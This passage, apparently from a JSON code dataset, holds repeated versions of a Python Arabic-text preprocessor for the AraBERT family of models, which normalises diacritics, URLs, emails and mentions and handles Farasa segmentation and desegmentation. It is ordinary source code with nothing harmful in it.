new_text.append(word)\n else:\n new_text.append(self.farasa_segmenter.segment(word))\n text = ' '.join(new_text)\n else:\n text = self.farasa_segmenter.segment(text)\n return self._farasa_segment(text)\n return text\n\n def unpreprocess(self, text, desegment=True):\n \"\"\"Re-formats the text to a classic format where punctuations, brackets, parenthesis are not seperated by whitespaces.\n The objective is to make the generated text of any model appear natural and not preprocessed.\n\n Args:\n text (str): input text to be un-preprocessed\n desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. Defaults to True.\n\n Returns:\n str: The unpreprocessed (and possibly Farasa-desegmented) text.\n \"\"\"\n if self.model_name in SEGMENTED_MODELS and desegment:\n text = self.desegment(text)\n text = re.sub(white_spaced_double_quotation_regex, '\"' + '\\\\1' +\n '\"', text)\n text = re.sub(white_spaced_single_quotation_regex, \"'\" + '\\\\1' +\n \"'\", text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\`' + '\\\\1' +\n '\\\\`', text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\—' + '\\\\1' +\n '\\\\—', text)\n text = text.replace('.', ' . ')\n text = ' '.join(text.split())\n text = re.sub('(\\\\d+) \\\\. (\\\\d+)', '\\\\1.\\\\2', text)\n text = re.sub('(\\\\d+) \\\\, (\\\\d+)', '\\\\1,\\\\2', text)\n text = re.sub(left_and_right_spaced_chars, '\\\\1', text)\n text = re.sub(left_spaced_chars, '\\\\1', text)\n text = re.sub(right_spaced_chars, '\\\\1', text)\n return text\n\n def desegment(self, text):\n \"\"\"\n Use this function if sentence tokenization was done using\n `from arabert.preprocess_arabert import preprocess` with Farasa enabled\n AraBERT segmentation using Farasa adds a space after the '+' for prefixes,\n and after before the '+' for suffixes\n\n Example:\n >>> desegment('ال+ دراس +ات')\n الدراسات\n \"\"\"\n text = text.replace('+ ', '+')\n text = text.replace(' +', '+')\n text = ' '.join([self._desegmentword(word) for word in text.split(' ')]\n )\n return text\n\n def _desegmentword(self, orig_word: str) ->str:\n \"\"\"\n Word segmentor that takes a Farasa Segmented Word and removes the '+' signs\n\n Example:\n >>> _desegmentword(\"ال+يومي+ة\")\n اليومية\n \"\"\"\n word = orig_word.replace('ل+ال+', 'لل')\n if 'ال+ال' not in orig_word:\n word = word.replace('ل+ال', 'لل')\n word = word.replace('+', '')\n word = word.replace('للل', 'لل')\n return word\n\n def _old_preprocess(self, text, do_farasa_tokenization):\n \"\"\"\n AraBERTv1 preprocessing Function\n \"\"\"\n text = str(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n text = re.sub('\\\\d+\\\\/[ء-ي]+\\\\/\\\\d+\\\\]', '', text)\n text = re.sub('ـ', '', text)\n text = re.sub('[«»]', ' \" ', text)\n if self.replace_urls_emails_mentions:\n text = re.sub(regex_url_step1, '[رابط]', text)\n text = re.sub(regex_url_step2, '[رابط]', text)\n text = re.sub(regex_url, '[رابط]', text)\n text = re.sub(regex_email, '[بريد]', text)\n text = re.sub(regex_mention, '[مستخدم]', text)\n text = re.sub('…', '\\\\.', text).strip()\n text = self._remove_redundant_punct(text)\n if self.replace_urls_emails_mentions:\n text = re.sub('\\\\[ رابط \\\\]|\\\\[ رابط\\\\]|\\\\[رابط \\\\]',\n ' [رابط] ', text)\n text = re.sub('\\\\[ بريد \\\\]|\\\\[ بريد\\\\]|\\\\[بريد \\\\]',\n ' [بريد] ', text)\n text = re.sub('\\\\[ مستخدم \\\\]|\\\\[ مستخدم\\\\]|\\\\[مستخدم \\\\]',\n ' [مستخدم] ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-٩ٱ-ٳa-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n if do_farasa_tokenization:\n text = self._tokenize_arabic_words_farasa(text)\n return text.strip()\n\n def _farasa_segment(self, text):\n line_farasa = text.split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n if '+' not in word:\n segmented_line.append(word)\n continue\n segmented_word = self._split_farasa_output(word)\n segmented_line.extend(segmented_word)\n return ' '.join(segmented_line)\n\n def _split_farasa_output(self, word):\n segmented_word = []\n temp_token = ''\n for i, c in enumerate(word):\n if c == '+':\n if temp_token == 'ك':\n if i == 1:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif word[i - 2] == '+':\n if segmented_word[-1][-1] == '+':\n segmented_word.append(temp_token + '+')\n temp_token = ''\n else:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n elif temp_token in prefix_list:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n else:\n segmented_word.append(temp_token)\n temp_token = ''\n continue\n temp_token += c\n if temp_token != '':\n if temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n else:\n segmented_word.append(temp_token)\n return segmented_word\n\n def _tokenize_arabic_words_farasa(self, line_input):\n if self.keep_emojis:\n line_farasa = []\n for word in line_input.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n line_farasa.append(word)\n else:\n line_farasa.append(self.farasa_segmenter.segment(word))\n else:\n line_farasa = self.farasa_segmenter.segment(line_input).split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n segmented_word = []\n for token in word.split('+'):\n if token in prefix_list:\n segmented_word.append(token + '+')\n elif token in suffix_list:\n segmented_word.append('+' + token)\n else:\n segmented_word.append(token)\n segmented_line.extend(segmented_word)\n return ' '.join(segmented_line)\n\n def _remove_elongation(self, text):\n \"\"\"\n :param text: the input text to remove elongation\n :return: delongated text\n \"\"\"\n for index_ in range(len(re.findall(regex_tatweel, text))):\n elongation = re.search(regex_tatweel, text)\n if elongation:\n elongation_pattern = elongation.group()\n elongation_replacement = elongation_pattern[0]\n elongation_pattern = re.escape(elongation_pattern)\n text = re.sub(elongation_pattern, elongation_replacement,\n text, flags=re.MULTILINE)\n else:\n break\n return text\n\n def _remove_redundant_punct(self, text):\n text_ = text\n result = re.search(redundant_punct_pattern, text)\n dif = 0\n while result:\n sub = result.group()\n sub = sorted(set(sub), key=sub.index)\n sub = ' ' + ''.join(list(sub)) + ' '\n text = ''.join((text[:result.span()[0] + dif], sub, text[result\n .span()[1] + dif:]))\n text_ = ''.join((text_[:result.span()[0]], text_[result.span()[\n 1]:])).strip()\n dif = abs(len(text) - len(text_))\n result = re.search(redundant_punct_pattern, text_)\n text = re.sub('\\\\s+', ' ', text)\n return text.strip()\n\n\n<mask token>\n",
"step-3": "<mask token>\nACCEPTED_MODELS = ['bert-base-arabertv01', 'bert-base-arabert',\n 'bert-base-arabertv02', 'bert-base-arabertv2', 'bert-large-arabertv02',\n 'bert-large-arabertv2', 'araelectra-base',\n 'araelectra-base-discriminator', 'araelectra-base-generator',\n 'aragpt2-base', 'aragpt2-medium', 'aragpt2-large', 'aragpt2-mega']\nSEGMENTED_MODELS = ['bert-base-arabert', 'bert-base-arabertv2',\n 'bert-large-arabertv2']\n\n\nclass ArbertmoPreprocessor:\n \"\"\"\n A Preprocessor class that cleans and preprocesses text for all models in the AraBERT repo.\n It also can unprocess the text ouput of the generated text\n\n Args:\n\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n\n Returns:\n\n ArBERTMoPreprocessor: the preprocessor class\n\n Example:\n\n from preprocess import ArBERTMoPreprocessor\n\n arabert_prep = ArBERTMoPreprocessor(\"aubmindlab/bert-base-arabertv2\")\n\n arabert_prep.preprocess(\"SOME ARABIC TEXT\")\n \"\"\"\n\n def __init__(self, model_name, keep_emojis=False, remove_html_markup=\n True, replace_urls_emails_mentions=True, strip_tashkeel=True,\n strip_tatweel=True, insert_white_spaces=True, remove_elongation=True):\n \"\"\"\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n \"\"\"\n model_name = model_name.replace('aubmindlab/', '')\n if model_name not in ACCEPTED_MODELS:\n logging.warning(\n \"Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation\"\n )\n self.model_name = 'bert-base-arabertv02'\n else:\n self.model_name = model_name\n if self.model_name in SEGMENTED_MODELS:\n logging.info(\n 'Selected Model requires pre-segmentation, Initializing FarasaSegmenter'\n )\n try:\n from farasa.segmenter import FarasaSegmenter\n self.farasa_segmenter = FarasaSegmenter(interactive=True)\n except:\n logging.warning(\n 'farasapy is not installed, you want be able to process text for AraBERTv1 and v2. Install it using: pip install farasapy'\n )\n else:\n logging.info(\n \"Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization\"\n )\n self.keep_emojis = keep_emojis\n if self.keep_emojis:\n import emoji\n self.emoji = emoji\n if self.model_name in SEGMENTED_MODELS:\n logging.warning(\n 'Keeping tweets with Farasa Segmentation is 10 times slower'\n )\n self.remove_html_markup = remove_html_markup\n self.replace_urls_emails_mentions = replace_urls_emails_mentions\n self.strip_tashkeel = strip_tashkeel\n self.strip_tatweel = strip_tatweel\n self.insert_white_spaces = insert_white_spaces\n self.remove_elongation = remove_elongation\n\n def preprocess(self, text):\n \"\"\"\n Preprocess takes an input text line an applies the same preprocessing used in AraBERT\n pretraining\n\n Args:\n\n text (:obj:`str`): inout text string\n\n Returns:\n\n string: A preprocessed string depending on which model was selected\n \"\"\"\n if self.model_name == 'bert-base-arabert':\n return self._old_preprocess(text, do_farasa_tokenization=True)\n if self.model_name == 'bert-base-arabertv01':\n return self._old_preprocess(text, do_farasa_tokenization=False)\n text = str(text)\n text = html.unescape(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n if self.strip_tatweel:\n text = araby.strip_tatweel(text)\n if self.replace_urls_emails_mentions:\n for reg in url_regexes:\n text = re.sub(reg, ' [رابط] ', text)\n for reg in email_regexes:\n text = re.sub(reg, ' [بريد] ', text)\n text = re.sub(user_mention_regex, ' [مستخدم] ', text)\n if self.remove_html_markup:\n text = re.sub('<br />', ' ', text)\n text = re.sub('</?[^>]+>', ' ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-ي٠-٩a-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n text = re.sub('(\\\\d+)([ء-غف-ي٠-٬]+)', ' \\\\1 \\\\2 ', text)\n text = re.sub('([ء-غف-ي٠-٬]+)(\\\\d+)', ' \\\\1 \\\\2 ', text)\n if self.keep_emojis:\n emoji_regex = ''.join(list(self.emoji.UNICODE_EMOJI['en'].keys()))\n rejected_chars_regex2 = '[^%s%s]' % (chars_regex, emoji_regex)\n text = re.sub(rejected_chars_regex2, ' ', text)\n else:\n text = re.sub(rejected_chars_regex, ' ', text)\n text = ' '.join(text.replace('️', '').split())\n if (self.model_name == 'bert-base-arabertv2' or self.model_name ==\n 'bert-large-arabertv2'):\n if self.keep_emojis:\n new_text = []\n for word in text.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n new_text.append(word)\n else:\n new_text.append(self.farasa_segmenter.segment(word))\n text = ' '.join(new_text)\n else:\n text = self.farasa_segmenter.segment(text)\n return self._farasa_segment(text)\n return text\n\n def unpreprocess(self, text, desegment=True):\n \"\"\"Re-formats the text to a classic format where punctuations, brackets, parenthesis are not seperated by whitespaces.\n The objective is to make the generated text of any model appear natural and not preprocessed.\n\n Args:\n text (str): input text to be un-preprocessed\n desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. Defaults to True.\n\n Returns:\n str: The unpreprocessed (and possibly Farasa-desegmented) text.\n \"\"\"\n if self.model_name in SEGMENTED_MODELS and desegment:\n text = self.desegment(text)\n text = re.sub(white_spaced_double_quotation_regex, '\"' + '\\\\1' +\n '\"', text)\n text = re.sub(white_spaced_single_quotation_regex, \"'\" + '\\\\1' +\n \"'\", text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\`' + '\\\\1' +\n '\\\\`', text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\—' + '\\\\1' +\n '\\\\—', text)\n text = text.replace('.', ' . ')\n text = ' '.join(text.split())\n text = re.sub('(\\\\d+) \\\\. (\\\\d+)', '\\\\1.\\\\2', text)\n text = re.sub('(\\\\d+) \\\\, (\\\\d+)', '\\\\1,\\\\2', text)\n text = re.sub(left_and_right_spaced_chars, '\\\\1', text)\n text = re.sub(left_spaced_chars, '\\\\1', text)\n text = re.sub(right_spaced_chars, '\\\\1', text)\n return text\n\n def desegment(self, text):\n \"\"\"\n Use this function if sentence tokenization was done using\n `from arabert.preprocess_arabert import preprocess` with Farasa enabled\n AraBERT segmentation using Farasa adds a space after the '+' for prefixes,\n and after before the '+' for suffixes\n\n Example:\n >>> desegment('ال+ دراس +ات')\n الدراسات\n \"\"\"\n text = text.replace('+ ', '+')\n text = text.replace(' +', '+')\n text = ' '.join([self._desegmentword(word) for word in text.split(' ')]\n )\n return text\n\n def _desegmentword(self, orig_word: str) ->str:\n \"\"\"\n Word segmentor that takes a Farasa Segmented Word and removes the '+' signs\n\n Example:\n >>> _desegmentword(\"ال+يومي+ة\")\n اليومية\n \"\"\"\n word = orig_word.replace('ل+ال+', 'لل')\n if 'ال+ال' not in orig_word:\n word = word.replace('ل+ال', 'لل')\n word = word.replace('+', '')\n word = word.replace('للل', 'لل')\n return word\n\n def _old_preprocess(self, text, do_farasa_tokenization):\n \"\"\"\n AraBERTv1 preprocessing Function\n \"\"\"\n text = str(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n text = re.sub('\\\\d+\\\\/[ء-ي]+\\\\/\\\\d+\\\\]', '', text)\n text = re.sub('ـ', '', text)\n text = re.sub('[«»]', ' \" ', text)\n if self.replace_urls_emails_mentions:\n text = re.sub(regex_url_step1, '[رابط]', text)\n text = re.sub(regex_url_step2, '[رابط]', text)\n text = re.sub(regex_url, '[رابط]', text)\n text = re.sub(regex_email, '[بريد]', text)\n text = re.sub(regex_mention, '[مستخدم]', text)\n text = re.sub('…', '\\\\.', text).strip()\n text = self._remove_redundant_punct(text)\n if self.replace_urls_emails_mentions:\n text = re.sub('\\\\[ رابط \\\\]|\\\\[ رابط\\\\]|\\\\[رابط \\\\]',\n ' [رابط] ', text)\n text = re.sub('\\\\[ بريد \\\\]|\\\\[ بريد\\\\]|\\\\[بريد \\\\]',\n ' [بريد] ', text)\n text = re.sub('\\\\[ مستخدم \\\\]|\\\\[ مستخدم\\\\]|\\\\[مستخدم \\\\]',\n ' [مستخدم] ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-٩ٱ-ٳa-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n if do_farasa_tokenization:\n text = self._tokenize_arabic_words_farasa(text)\n return text.strip()\n\n def _farasa_segment(self, text):\n line_farasa = text.split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n if '+' not in word:\n segmented_line.append(word)\n continue\n segmented_word = self._split_farasa_output(word)\n segmented_line.extend(segmented_word)\n return ' '.join(segmented_line)\n\n def _split_farasa_output(self, word):\n segmented_word = []\n temp_token = ''\n for i, c in enumerate(word):\n if c == '+':\n if temp_token == 'ك':\n if i == 1:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif word[i - 2] == '+':\n if segmented_word[-1][-1] == '+':\n segmented_word.append(temp_token + '+')\n temp_token = ''\n else:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n elif temp_token in prefix_list:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n else:\n segmented_word.append(temp_token)\n temp_token = ''\n continue\n temp_token += c\n if temp_token != '':\n if temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n else:\n segmented_word.append(temp_token)\n return segmented_word\n\n def _tokenize_arabic_words_farasa(self, line_input):\n if self.keep_emojis:\n line_farasa = []\n for word in line_input.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n line_farasa.append(word)\n else:\n line_farasa.append(self.farasa_segmenter.segment(word))\n else:\n line_farasa = self.farasa_segmenter.segment(line_input).split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n segmented_word = []\n for token in word.split('+'):\n if token in prefix_list:\n segmented_word.append(token + '+')\n elif token in suffix_list:\n segmented_word.append('+' + token)\n else:\n segmented_word.append(token)\n segmented_line.extend(segmented_word)\n return ' '.join(segmented_line)\n\n def _remove_elongation(self, text):\n \"\"\"\n :param text: the input text to remove elongation\n :return: delongated text\n \"\"\"\n for index_ in range(len(re.findall(regex_tatweel, text))):\n elongation = re.search(regex_tatweel, text)\n if elongation:\n elongation_pattern = elongation.group()\n elongation_replacement = elongation_pattern[0]\n elongation_pattern = re.escape(elongation_pattern)\n text = re.sub(elongation_pattern, elongation_replacement,\n text, flags=re.MULTILINE)\n else:\n break\n return text\n\n def _remove_redundant_punct(self, text):\n text_ = text\n result = re.search(redundant_punct_pattern, text)\n dif = 0\n while result:\n sub = result.group()\n sub = sorted(set(sub), key=sub.index)\n sub = ' ' + ''.join(list(sub)) + ' '\n text = ''.join((text[:result.span()[0] + dif], sub, text[result\n .span()[1] + dif:]))\n text_ = ''.join((text_[:result.span()[0]], text_[result.span()[\n 1]:])).strip()\n dif = abs(len(text) - len(text_))\n result = re.search(redundant_punct_pattern, text_)\n text = re.sub('\\\\s+', ' ', text)\n return text.strip()\n\n\nprefix_list = ['ال', 'و', 'ف', 'ب', 'ك', 'ل', 'لل', 'ال', 'و', 'ف', 'ب',\n 'ك', 'ل', 'لل', 'س']\nsuffix_list = ['ه', 'ها', 'ك', 'ي', 'هما', 'كما', 'نا', 'كم', 'هم', 'هن',\n 'كن', 'ا', 'ان', 'ين', 'ون', 'وا', 'ات', 'ت', 'ن', 'ة', 'ه', 'ها', 'ك',\n 'ي', 'هما', 'كما', 'نا', 'كم', 'هم', 'هن', 'كن', 'ا', 'ان', 'ين', 'ون',\n 'وا', 'ات', 'ت', 'ن', 'ة']\nother_tokens = ['[رابط]', '[مستخدم]', '[بريد]']\nprefix_symbols = [(x + '+') for x in prefix_list]\nsuffix_symblos = [('+' + x) for x in suffix_list]\nnever_split_tokens = list(set(prefix_symbols + suffix_symblos + other_tokens))\nurl_regexes = [\n '(http(s)?:\\\\/\\\\/.)?(www\\\\.)?[-a-zA-Z0-9@:%._\\\\+~#=]{2,256}\\\\.[a-z]{2,6}\\\\b([-a-zA-Z0-9@:%_\\\\+.~#?&//=]*)'\n , '@(https?|ftp)://(-\\\\.)?([^\\\\s/?\\\\.#-]+\\\\.?)+(/[^\\\\s]*)?$@iS',\n 'http[s]?://[a-zA-Z0-9_\\\\-./~\\\\?=%&]+', 'www[a-zA-Z0-9_\\\\-?=%&/.~]+',\n '[a-zA-Z]+\\\\.com', '(?=http)[^\\\\s]+', '(?=www)[^\\\\s]+', '://']\nuser_mention_regex = '@[\\\\w\\\\d]+'\nemail_regexes = ['[\\\\w-]+@([\\\\w-]+\\\\.)+[\\\\w-]+', '\\\\S+@\\\\S+']\nredundant_punct_pattern = (\n '([!\\\\\"#\\\\$%\\\\\\'\\\\(\\\\)\\\\*\\\\+,\\\\.:;\\\\-<=·>?@\\\\[\\\\\\\\\\\\]\\\\^_ـ`{\\\\|}~—٪’،؟`୍“؛”ۚ【»؛\\\\s+«–…‘]{2,})'\n )\nregex_tatweel = '(\\\\D)\\\\1{2,}'\nrejected_chars_regex = (\n '[^0-9\\\\u0621-\\\\u063A\\\\u0640-\\\\u066C\\\\u0671-\\\\u0674a-zA-Z\\\\[\\\\]!\\\\\"#\\\\$%\\\\\\'\\\\(\\\\)\\\\*\\\\+,\\\\.:;\\\\-<=·>?@\\\\[\\\\\\\\\\\\]\\\\^_ـ`{\\\\|}~—٪’،؟`୍“؛”ۚ»؛\\\\s+«–…‘]'\n )\nregex_url_step1 = '(?=http)[^\\\\s]+'\nregex_url_step2 = '(?=www)[^\\\\s]+'\nregex_url = (\n '(http(s)?:\\\\/\\\\/.)?(www\\\\.)?[-a-zA-Z0-9@:%._\\\\+~#=]{2,256}\\\\.[a-z]{2,6}\\\\b([-a-zA-Z0-9@:%_\\\\+.~#?&//=]*)'\n )\nregex_mention = '@[\\\\w\\\\d]+'\nregex_email = '\\\\S+@\\\\S+'\nchars_regex = (\n '0-9\\\\u0621-\\\\u063A\\\\u0640-\\\\u066C\\\\u0671-\\\\u0674a-zA-Z\\\\[\\\\]!\\\\\"#\\\\$%\\\\\\'\\\\(\\\\)\\\\*\\\\+,\\\\.:;\\\\-<=·>?@\\\\[\\\\\\\\\\\\]\\\\^_ـ`{\\\\|}~—٪’،؟`୍“؛”ۚ»؛\\\\s+«–…‘'\n )\nwhite_spaced_double_quotation_regex = '\\\\\"\\\\s+([^\"]+)\\\\s+\\\\\"'\nwhite_spaced_single_quotation_regex = \"\\\\'\\\\s+([^']+)\\\\s+\\\\'\"\nwhite_spaced_back_quotation_regex = '\\\\`\\\\s+([^`]+)\\\\s+\\\\`'\nwhite_spaced_em_dash = '\\\\—\\\\s+([^—]+)\\\\s+\\\\—'\nleft_spaced_chars = ' ([\\\\]!#\\\\$%\\\\),\\\\.:;\\\\?}٪’،؟”؛…»·])'\nright_spaced_chars = '([\\\\[\\\\(\\\\{“«‘*\\\\~]) '\nleft_and_right_spaced_chars = ' ([\\\\+\\\\-\\\\<\\\\=\\\\>\\\\@\\\\\\\\\\\\^\\\\_\\\\|\\\\–]) '\n",
"step-4": "import html\nimport logging\nimport re\nimport pyarabic.araby as araby\nACCEPTED_MODELS = ['bert-base-arabertv01', 'bert-base-arabert',\n 'bert-base-arabertv02', 'bert-base-arabertv2', 'bert-large-arabertv02',\n 'bert-large-arabertv2', 'araelectra-base',\n 'araelectra-base-discriminator', 'araelectra-base-generator',\n 'aragpt2-base', 'aragpt2-medium', 'aragpt2-large', 'aragpt2-mega']\nSEGMENTED_MODELS = ['bert-base-arabert', 'bert-base-arabertv2',\n 'bert-large-arabertv2']\n\n\nclass ArbertmoPreprocessor:\n \"\"\"\n A Preprocessor class that cleans and preprocesses text for all models in the AraBERT repo.\n It also can unprocess the text ouput of the generated text\n\n Args:\n\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n\n Returns:\n\n ArBERTMoPreprocessor: the preprocessor class\n\n Example:\n\n from preprocess import ArBERTMoPreprocessor\n\n arabert_prep = ArBERTMoPreprocessor(\"aubmindlab/bert-base-arabertv2\")\n\n arabert_prep.preprocess(\"SOME ARABIC TEXT\")\n \"\"\"\n\n def __init__(self, model_name, keep_emojis=False, remove_html_markup=\n True, replace_urls_emails_mentions=True, strip_tashkeel=True,\n strip_tatweel=True, insert_white_spaces=True, remove_elongation=True):\n \"\"\"\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel 